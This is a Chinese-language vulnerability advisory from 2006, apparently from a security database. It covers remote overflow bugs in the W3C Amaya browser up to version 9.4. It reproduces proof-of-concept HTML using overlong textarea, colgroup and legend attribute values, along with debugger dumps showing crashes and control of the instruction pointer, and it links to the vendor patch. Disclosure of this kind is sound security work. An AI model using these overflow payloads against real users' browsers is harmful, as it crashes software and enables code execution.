安全研究
安全漏洞
W3C Amaya多个远程溢出漏洞
发布日期:2006-04-13
更新日期:2006-04-13
受影响系统:
W3C Amaya <= 9.4不受影响系统:
W3C Amaya 9.5描述:
BUGTRAQ ID: 17507
W3C的Amaya是一个所见即所得的Web浏览器和认证程序。
Amaya实现上存在多个漏洞,远程攻击者可能导致程序崩溃或执行任意指令。
以下代码段(可能还有其他类似的代码段)可以强迫Amaya崩溃:
> <colgroup compact="Ax200">
> [...]
> <textarea rows="Ax200">
> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 004edd61 03f3 add esi,ebx
> 004edd63 a4 movsb
> 004edd64 8b4500 mov eax,[ebp]
> 004edd67 8b8c241c010000 mov ecx,[esp+0x11c]
> 004edd6e 8b942418010000 mov edx,[esp+0x118]
> 004edd75 50 push eax
> 004edd76 51 push ecx
> 004edd77 53 push ebx
> 004edd78 52 push edx
> 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
> 004edd7e 53 push ebx
> 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
> 004edd84 83c428 add esp,0x28
> 004edd87 8bbc24fc000000 mov edi,[esp+0xfc]
> 004edd8e 8b942400010000 mov edx,[esp+0x100]
> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
> ds:0023:41414181=????????
> 004edd98 83f844 cmp eax,0x44
> 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
> 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
> 004edda6 0f8465060000 je amaya+0xee411 (004ee411)
> 004eddac 8b4500 mov eax,[ebp]
> 004eddaf 8b8c2408010000 mov ecx,[esp+0x108]
> 004eddb6 6aff push 0xff
> 004eddb8 50 push eax
> 004eddb9 51 push ecx
> 004eddba 57 push edi
> 004eddbb e8d33af1ff call amaya+0x1893 (00401893)
> 004eddc0 83c410 add esp,0x10
> 004eddc3 5f pop edi
> 004eddc4 5e pop esi
> 004eddc5 5d pop ebp
这样就可以控制EIP:
> <textarea rows=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>
> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
此外,以下代码段也可以导致Amaya 9.4崩溃:
> <legend color="Ax200">
> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 00516114 56 push esi
> 00516115 57 push edi
> 00516116 33ff xor edi,edi
> 00516118 33f6 xor esi,esi
> 0051611a 3bcf cmp ecx,edi
> 0051611c 893d943df101 mov [amaya+0x1b13d94
> (01f13d94)],edi
> 00516122 7511 jnz amaya+0x116135 (00516135)
> 00516124 6a0a push 0xa
> 00516126 e825d80500 call amaya+0x173950 (00573950)
> 0051612b 83c404 add esp,0x4
> 0051612e 8bd7 mov edx,edi
> 00516130 8bc6 mov eax,esi
> 00516132 5f pop edi
> 00516133 5e pop esi
> 00516134 c3 ret
> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
> ds:0023:41414175=????????
> 00516138 3bc7 cmp eax,edi
> 0051613a 74f2 jz amaya+0x11612e (0051612e)
> 0051613c 8b4938 mov ecx,[ecx+0x38]
> 0051613f 5f pop edi
> 00516140 8bd1 mov edx,ecx
> 00516142 5e pop esi
> 00516143 c3 ret
> Nopslide..
控制EIP:
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>
> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
>
> Funktion: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
<*来源:Thomas Waldegger (bugtraq@morph3us.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114494545508251&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=114494629302223&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<textarea rows="Ax200">
<legend color="Ax200">
建议:
厂商补丁:
W3C
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.w3.org/Amaya/User/BinDist.html
浏览次数:2895
严重程度:0(网友投票)
绿盟科技给您安全的保障